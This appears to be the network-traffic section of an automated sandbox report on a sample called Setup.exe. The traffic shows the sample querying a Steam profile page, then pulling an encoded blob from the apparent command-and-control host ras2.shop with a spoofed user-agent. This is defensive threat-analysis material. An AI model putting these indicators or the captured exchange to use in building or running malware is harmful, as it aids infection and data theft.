                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:23.110851049 CET53574721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:44.302900076 CET53621901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:45.462949991 CET53542581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:15.863406897 CET53637371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:30:02.304074049 CET53614091.1.1.1192.168.2.4

                                                                                                                                                                                                                                                    ICMP Packets

                                                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.814538002 CET192.168.2.41.1.1.1c22c(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:14.059928894 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.172112942 CET192.168.2.41.1.1.10xcf57Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.753480911 CET192.168.2.41.1.1.10xebe5Standard query (0)ras2.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.398426056 CET192.168.2.41.1.1.10xc7b4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.398716927 CET192.168.2.41.1.1.10x5ffaStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.576178074 CET192.168.2.41.1.1.10x230aStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.576400042 CET192.168.2.41.1.1.10xf860Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.568097115 CET192.168.2.41.1.1.10x423dStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.568245888 CET192.168.2.41.1.1.10xbedaStandard query (0)play.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:34.312196016 CET1.1.1.1192.168.2.40xcf57No error (0)steamcommunity.com104.121.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.896795034 CET1.1.1.1192.168.2.40xebe5No error (0)ras2.shop104.21.2.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.896795034 CET1.1.1.1192.168.2.40xebe5No error (0)ras2.shop172.67.129.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.535466909 CET1.1.1.1192.168.2.40x5ffaNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:44.556570053 CET1.1.1.1192.168.2.40xc7b4No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.713077068 CET1.1.1.1192.168.2.40x230aNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.713077068 CET1.1.1.1192.168.2.40x230aNo error (0)plus.l.google.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.814459085 CET1.1.1.1192.168.2.40xf860No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.705461025 CET1.1.1.1192.168.2.40x423dNo error (0)play.google.com172.217.19.206A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                                    • ras2.shop
                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                    • apis.google.com

                                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.449732104.121.10.344436592C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-27 20:27:35 UTC257OUTGET /profiles/76561199680660089 HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3
                                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-12-27 20:27:36 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:36 GMT
                                                                                                                                                                                                                                                    Content-Length: 35329
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: sessionid=606f8ada2fffe233e9c73c4f; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                    2024-12-27 20:27:36 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                    2024-12-27 20:27:36 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                                                                                                                                                                                                    Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                                                                                                                                                                                    2024-12-27 20:27:36 UTC3768INData Raw: 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 36 38 30 36 36 30 30 38 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66
                                                                                                                                                                                                                                                    Data Ascii: ofiles/76561199680660089/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0</span></div></div></a></div><div class="prof
                                                                                                                                                                                                                                                    2024-12-27 20:27:36 UTC698INData Raw: 09 09 09 09 09 26 6e 62 73 70 3b 20 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4c 65 67 61 6c 3c 2f 61 3e 0a 09 09 09 09 09 09 09 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 75 62 73 63 72 69 62 65 72 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62
                                                                                                                                                                                                                                                    Data Ascii: &nbsp; | &nbsp;<a href="https://store.steampowered.com/legal/" target="_blank">Legal</a>&nbsp;| &nbsp;<a href="http://store.steampowered.com/subscriber_agreement/" target="_blank">Steam Subscriber Agreement</a> &nb


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.449734104.21.2.1144436592C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC262OUTGET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3.1; HP Compaq 2110b Build/JLS36C) AppleWebKit/601.32 (KHTML, like Gecko) Chrome/50.0.1590.318 Mobile Safari/534.3
                                                                                                                                                                                                                                                    Host: ras2.shop
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:38 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqQZRoVCLRy1UsiC6b0mguQ0%2BuUjI8bH9xRph%2BLcMDGT%2F4Mo4CVTZ7EA3A%2F6N5VeqHQwdYAC%2Bmnd53hAAFC%2BpJM9ZxXJ2XbjvtNltEJQBEr3cKDWE9k13CXW7g8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f8c0d6cedbaf799-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1610&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=900&delivery_rate=1791411&cwnd=92&unsent_bytes=0&cid=030d68651d7b7862&ts=618&x=0"
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC582INData Raw: 33 37 64 36 0d 0a 51 78 64 51 45 77 35 69 54 42 42 64 49 67 49 58 55 47 31 6f 57 67 38 51 48 79 4a 49 46 77 67 54 61 47 56 37 58 56 42 68 56 47 6c 75 64 6c 74 57 55 46 35 57 58 47 52 32 57 6b 4e 62 56 46 4a 75 62 31 56 4c 55 45 41 52 63 46 68 44 55 78 45 73 47 6b 45 51 43 77 55 56 46 55 4a 64 49 67 49 58 55 56 6c 47 56 6c 70 58 48 57 56 41 55 42 42 4d 47 45 49 56 58 42 45 36 47 6c 64 75 62 56 63 42 46 52 34 52 63 42 6f 50 45 47 31 6f 64 56 68 52 55 6d 78 6b 61 58 56 65 57 31 35 62 56 32 39 63 65 31 31 41 58 6c 6c 63 46 32 46 4c 55 32 52 70 5a 30 4a 52 53 78 64 32 55 6e 52 5a 46 78 34 54 51 42 73 4e 41 78 38 69 53 46 73 51 43 78 5a 61 58 30 42 63 62 56 30 62 56 30 6c 52 47 30 6f 65 53 43 4a 57 46 77 67 54 56 6d 56 72 55 51 73 69 46 42 64 43 45 77 34 62 61
                                                                                                                                                                                                                                                    Data Ascii: 37d6QxdQEw5iTBBdIgIXUG1oWg8QHyJIFwgTaGV7XVBhVGludltWUF5WXGR2WkNbVFJub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXUVlGVlpXHWVAUBBMGEIVXBE6GldubVcBFR4RcBoPEG1odVhRUmxkaXVeW15bV29ce11AXllcF2FLU2RpZ0JRSxd2UnRZFx4TQBsNAx8iSFsQCxZaX0BcbV0bV0lRG0oeSCJWFwgTVmVrUQsiFBdCEw4ba
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 55 51 6b 57 46 52 56 43 45 54 6f 61 61 57 35 39 57 31 70 57 58 6d 39 63 66 31 70 64 56 6c 68 63 61 32 35 77 61 45 70 61 58 31 51 55 65 6c 5a 63 55 6e 4a 42 61 57 35 6b 52 31 78 46 45 6e 64 68 54 46 51 51 48 52 5a 4e 46 51 67 43 4c 42 70 46 58 42 4d 4f 47 31 52 61 51 57 39 56 55 42 78 55 54 46 77 56 54 78 39 37 47 6c 73 51 43 78 5a 62 61 32 35 51 4d 67 67 58 48 68 4e 45 47 77 30 51 62 31 78 30 57 6c 46 51 57 47 56 72 64 30 4e 70 57 78 56 69 51 31 31 50 56 6c 46 4b 49 48 70 48 58 55 5a 48 58 45 56 75 62 31 56 4c 55 45 41 52 63 46 68 44 55 78 45 73 47 6b 45 51 43 77 55 56 46 55 4a 64 49 67 49 58 56 30 46 64 57 68 6c 58 53 32 55 61 53 42 35 4b 46 6c 63 56 43 42 46 69 5a 47 6c 52 41 41 45 62 47 78 42 44 49 67 49 58 62 6d 31 34 56 6c 52 54 58 31 78 6b 59 31 74
                                                                                                                                                                                                                                                    Data Ascii: UQkWFRVCEToaaW59W1pWXm9cf1pdVlhca25waEpaX1QUelZcUnJBaW5kR1xFEndhTFQQHRZNFQgCLBpFXBMOG1RaQW9VUBxUTFwVTx97GlsQCxZba25QMggXHhNEGw0Qb1x0WlFQWGVrd0NpWxViQ11PVlFKIHpHXUZHXEVub1VLUEARcFhDUxEsGkEQCwUVFUJdIgIXV0FdWhlXS2UaSB5KFlcVCBFiZGlRAAEbGxBDIgIXbm14VlRTX1xkY1t
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 31 78 74 52 6c 64 44 46 48 31 57 52 6c 49 69 46 42 64 47 45 77 34 49 47 78 42 44 62 68 6f 50 45 46 31 64 58 46 56 54 58 43 35 64 54 56 63 54 53 52 56 4d 45 46 30 69 41 68 64 51 62 57 68 61 42 41 6f 52 4c 42 70 46 45 41 73 57 5a 57 74 2b 58 47 4e 5a 57 57 35 74 5a 58 42 6e 45 6d 42 31 53 6c 4e 75 62 57 46 4b 55 6b 41 54 52 46 6c 42 55 78 4d 59 47 30 4d 51 43 54 45 55 46 30 4a 66 46 67 4d 56 51 31 70 77 46 6c 42 4b 56 42 5a 45 47 30 6b 52 62 68 6f 50 45 46 4e 6f 5a 56 51 42 43 69 49 55 46 30 49 54 44 68 74 72 62 6e 39 76 57 31 52 65 62 57 68 33 58 6c 46 62 63 6c 64 59 56 32 31 6f 62 45 52 58 51 53 42 38 56 45 5a 51 46 68 55 56 52 68 45 36 43 52 6b 51 51 56 6f 62 44 52 42 64 61 56 74 64 51 46 35 5a 58 42 6c 58 53 32 55 61 53 42 35 4b 46 6c 63 56 43 42 46 69
                                                                                                                                                                                                                                                    Data Ascii: 1xtRldDFH1WRlIiFBdGEw4IGxBDbhoPEF1dXFVTXC5dTVcTSRVMEF0iAhdQbWhaBAoRLBpFEAsWZWt+XGNZWW5tZXBnEmB1SlNubWFKUkATRFlBUxMYG0MQCTEUF0JfFgMVQ1pwFlBKVBZEG0kRbhoPEFNoZVQBCiIUF0ITDhtrbn9vW1RebWh3XlFbcldYV21obERXQSB8VEZQFhUVRhE6CRkQQVobDRBdaVtdQF5ZXBlXS2UaSB5KFlcVCBFi
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 73 62 45 45 4d 69 41 68 64 75 62 57 5a 57 56 6c 39 61 62 6c 39 70 62 6e 35 45 58 45 56 54 45 31 4e 58 55 30 5a 47 56 55 74 53 62 6d 39 50 53 46 42 41 55 42 52 71 51 31 4e 52 62 46 30 58 48 68 4e 41 47 77 30 44 48 79 4a 49 57 78 41 4c 46 6c 5a 48 56 30 46 68 46 6c 42 4b 56 42 5a 45 47 30 6b 52 62 68 6f 50 45 46 4e 6f 5a 56 51 44 41 43 49 55 46 30 49 54 44 68 74 72 62 6d 46 76 57 56 68 62 58 31 4e 6c 61 33 31 44 5a 55 70 55 45 6d 4a 62 58 30 4e 46 55 6e 4a 64 61 57 35 2b 52 46 78 46 55 78 4e 48 59 42 56 68 52 56 56 62 57 31 63 52 4c 42 70 42 45 41 73 46 46 52 56 43 58 53 49 43 46 31 31 42 55 55 74 57 48 46 5a 34 58 52 64 50 48 55 38 62 57 52 41 4a 49 6c 70 70 62 6c 49 46 43 68 55 65 45 58 41 61 44 78 42 74 61 48 56 59 55 56 4a 73 5a 47 6c 39 51 56 46 4c 56
                                                                                                                                                                                                                                                    Data Ascii: sbEEMiAhdubWZWVl9abl9pbn5EXEVTE1NXU0ZGVUtSbm9PSFBAUBRqQ1NRbF0XHhNAGw0DHyJIWxALFlZHV0FhFlBKVBZEG0kRbhoPEFNoZVQDACIUF0ITDhtrbmFvWVhbX1Nla31DZUpUEmJbX0NFUnJdaW5+RFxFUxNHYBVhRVVbW1cRLBpBEAsFFRVCXSICF11BUUtWHFZ4XRdPHU8bWRAJIlppblIFChUeEXAaDxBtaHVYUVJsZGl9QVFLV
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 58 58 46 4a 63 57 56 5a 65 5a 46 74 53 57 6c 39 52 58 6c 35 66 58 53 49 55 46 31 77 54 44 68 74 41 41 42 46 39 46 45 34 51 57 46 41 62 44 52 42 56 61 46 70 61 57 6c 68 5a 57 46 4a 65 55 57 39 51 52 56 68 54 56 6c 56 54 55 56 31 6e 57 31 74 54 51 56 70 64 57 46 5a 5a 63 42 6f 5a 45 46 38 57 41 78 56 46 41 43 4a 46 47 55 6b 54 58 56 30 56 43 42 46 6a 56 6c 68 54 58 46 56 59 56 46 70 44 63 46 5a 65 57 46 5a 61 55 46 74 57 51 32 52 56 58 6c 4e 51 58 31 78 64 58 46 74 68 58 52 63 65 45 31 6f 62 44 52 42 45 4f 42 70 49 48 6b 6f 57 55 46 4d 51 43 53 4a 57 57 56 42 63 57 6c 64 65 57 46 42 75 56 46 42 56 57 6c 35 54 52 31 46 56 61 6c 74 5a 58 31 4a 53 58 6c 42 55 56 6d 5a 63 57 42 41 64 46 6c 63 56 43 42 46 33 41 52 64 50 48 55 38 62 58 6c 59 52 4f 68 70 55 58 31
                                                                                                                                                                                                                                                    Data Ascii: XXFJcWVZeZFtSWl9RXl5fXSIUF1wTDhtAABF9FE4QWFAbDRBVaFpaWlhZWFJeUW9QRVhTVlVTUV1nW1tTQVpdWFZZcBoZEF8WAxVFACJFGUkTXV0VCBFjVlhTXFVYVFpDcFZeWFZaUFtWQ2RVXlNQX1xdXFthXRceE1obDRBEOBpIHkoWUFMQCSJWWVBcWldeWFBuVFBVWl5TR1FValtZX1JSXlBUVmZcWBAdFlcVCBF3ARdPHU8bXlYROhpUX1
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 61 6c 56 64 58 6c 39 54 56 6c 4a 55 55 6d 6c 58 58 31 52 64 58 6c 70 63 57 31 39 6f 55 46 6c 61 55 6c 34 62 47 78 42 64 49 67 49 58 52 51 4d 4e 47 30 6f 65 53 43 4a 52 55 52 41 4c 46 6c 4a 62 58 46 4a 6c 55 6c 39 56 55 31 31 62 57 6c 70 66 5a 55 68 64 58 46 6c 45 56 46 5a 64 56 57 39 51 55 6c 6c 42 55 31 4a 54 45 42 38 69 56 68 63 49 45 30 4d 4c 42 78 42 4f 4c 45 4d 58 57 31 55 57 41 78 56 62 55 57 35 64 58 31 5a 58 58 6c 52 61 57 55 4e 6a 56 6c 6c 43 56 46 5a 53 57 31 39 64 61 31 64 51 58 56 68 63 56 6c 46 58 55 43 49 55 46 31 77 54 44 68 74 41 41 41 49 69 52 52 6c 4a 45 31 31 64 46 51 67 52 5a 56 4a 58 55 31 31 57 57 46 78 64 51 32 78 62 58 56 35 57 58 46 78 55 56 6c 4a 73 56 56 42 58 56 46 56 54 57 56 74 65 61 46 55 58 48 68 4e 61 47 77 30 51 52 44 49
                                                                                                                                                                                                                                                    Data Ascii: alVdXl9TVlJUUmlXX1RdXlpcW19oUFlaUl4bGxBdIgIXRQMNG0oeSCJRURALFlJbXFJlUl9VU11bWlpfZUhdXFlEVFZdVW9QUllBU1JTEB8iVhcIE0MLBxBOLEMXW1UWAxVbUW5dX1ZXXlRaWUNjVllCVFZSW19da1dQXVhcVlFXUCIUF1wTDhtAAAIiRRlJE11dFQgRZVJXU11WWFxdQ2xbXV5WXFxUVlJsVVBXVFVTWVteaFUXHhNaGw0QRDI
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 55 77 51 57 6d 51 61 44 78 42 58 52 46 70 57 58 31 70 6c 55 6c 4a 55 58 46 6c 52 57 56 70 52 59 31 6c 54 58 31 39 52 58 31 56 62 57 57 4a 55 58 46 78 58 55 68 73 62 45 46 30 69 41 68 64 46 42 51 4d 62 53 68 35 49 49 6c 46 52 45 41 73 57 58 46 42 57 56 32 52 53 56 31 68 64 56 31 4e 55 57 56 70 6c 55 6c 64 51 55 46 70 63 57 46 42 59 63 46 39 62 58 30 46 66 56 30 63 51 48 79 4a 57 46 77 67 54 51 77 30 50 45 45 34 73 51 78 64 62 56 52 59 44 46 56 78 61 61 46 52 51 55 46 56 59 57 6c 52 59 57 57 52 64 58 31 56 65 56 30 6c 59 56 56 56 77 55 46 42 54 57 6c 39 4a 57 46 5a 52 49 68 51 58 58 42 4d 4f 47 30 41 47 43 69 4a 46 47 55 6b 54 58 56 30 56 43 42 46 70 56 46 64 62 55 31 39 65 58 46 39 66 61 31 42 53 58 45 46 54 58 31 74 52 57 57 52 65 55 46 52 54 58 30 6c 53
                                                                                                                                                                                                                                                    Data Ascii: UwQWmQaDxBXRFpWX1plUlJUXFlRWVpRY1lTX19RX1VbWWJUXFxXUhsbEF0iAhdFBQMbSh5IIlFREAsWXFBWV2RSV1hdV1NUWVplUldQUFpcWFBYcF9bX0FfV0cQHyJWFwgTQw0PEE4sQxdbVRYDFVxaaFRQUFVYWlRYWWRdX1VeV0lYVVVwUFBTWl9JWFZRIhQXXBMOG0AGCiJFGUkTXV0VCBFpVFdbU19eXF9fa1BSXEFTX1tRWWReUFRTX0lS
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 34 54 47 42 74 5a 45 41 6b 69 53 41 4d 46 45 30 6b 56 54 42 42 61 5a 42 6f 50 45 46 68 59 58 6c 52 63 57 32 56 55 52 56 46 5a 57 6c 70 53 56 31 70 77 55 55 56 62 57 31 56 56 58 56 6c 52 62 46 70 57 58 56 4e 59 47 78 73 51 58 53 49 43 46 30 49 48 44 42 74 4b 48 6b 67 69 55 56 45 51 43 78 5a 58 57 56 56 51 5a 56 74 65 55 46 42 45 58 46 56 55 57 6d 31 57 57 56 78 59 58 56 42 57 57 6c 68 68 56 6c 46 52 58 56 5a 56 56 52 41 66 49 6c 59 58 43 42 4e 45 44 77 34 51 54 69 78 44 46 31 74 56 46 67 4d 56 58 56 46 76 56 31 74 54 57 6c 46 55 57 46 52 44 59 56 52 57 56 56 5a 63 56 6c 52 55 58 47 46 63 57 6c 52 59 55 46 4e 63 57 56 67 69 46 42 64 63 45 77 34 62 52 77 55 44 49 6b 55 5a 53 52 4e 64 58 52 55 49 45 57 5a 63 58 31 4e 63 56 56 4a 48 56 46 46 69 58 46 46 55 57
                                                                                                                                                                                                                                                    Data Ascii: 4TGBtZEAkiSAMFE0kVTBBaZBoPEFhYXlRcW2VURVFZWlpSV1pwUUVbW1VVXVlRbFpWXVNYGxsQXSICF0IHDBtKHkgiUVEQCxZXWVVQZVteUFBEXFVUWm1WWVxYXVBWWlhhVlFRXVZVVRAfIlYXCBNEDw4QTixDF1tVFgMVXVFvV1tTWlFUWFRDYVRWVVZcVlRUXGFcWlRYUFNcWVgiFBdcEw4bRwUDIkUZSRNdXRUIEWZcX1NcVVJHVFFiXFFUW
